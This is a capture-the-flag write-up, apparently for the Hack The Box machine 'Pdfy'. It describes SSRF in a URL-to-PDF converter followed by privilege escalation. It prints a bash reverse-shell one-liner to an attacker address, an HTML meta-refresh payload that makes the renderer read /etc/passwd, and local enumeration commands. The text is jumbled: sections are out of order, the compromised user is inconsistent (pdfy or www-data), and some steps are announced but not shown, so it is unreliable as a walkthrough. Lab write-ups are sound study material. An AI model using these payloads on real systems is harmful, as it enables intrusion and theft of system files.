Pdfy HTB Writeup Upd

After executing the exploit, we gain a reverse shell as the user pdfy . We then proceed to explore the machine and gather more information about the user and its privileges.

User pdfy may run the following commands on pdfy: (ALL) NOPASSWD: ALL

This PHP script, when requested, sends an HTTP redirect response to the client (in this case, wkhtmltopdf). The redirect instructs it to immediately request the file:///etc/passwd resource.

When you spawn the target machine and navigate to the web interface, you are greeted by a simple form containing a single input field: "Enter URL to convert to PDF".

Trigger a reverse shell:

    http://10.10.10.x/shell.php?cmd=bash -c 'bash -i >& /dev/tcp/10.10.x.x/4444 0>&1'

We are now on the box as the www-data user.

5. Privilege Escalation: Root Access

With low-level access, we need to escalate to root.

Enumerating Local Privileges

We check for SUID binaries, sudo rights, or cron jobs:

    sudo -l
    find / -perm -u=s -type f 2>/dev/null

Exploit: System Service/Cron Job

Navigating to the website, we find a simple web application that takes a URL and converts the webpage into a PDF document. This is a massive "low-hanging fruit" indicator for SSRF: whenever an application fetches content from a remote URL you provide, you should immediately test whether it can be made to fetch internal resources.

2. Identifying the Vulnerability (SSRF)

Inputting a direct internal scheme or local loopback address (e.g., http://127.0.0.1 or file:///etc/passwd) results in an error message. The application implements a basic validation layer to prevent users from requesting internal resources directly.

3. Identifying the Rendering Engine

    <!DOCTYPE html>
    <html>
      <head>
        <meta http-equiv="refresh" content="0; url=file:///etc/passwd" />
      </head>
      <body>
        <p>Redirecting...</p>
      </body>
    </html>

We launch an nmap scan against the target IP to find open ports and running services.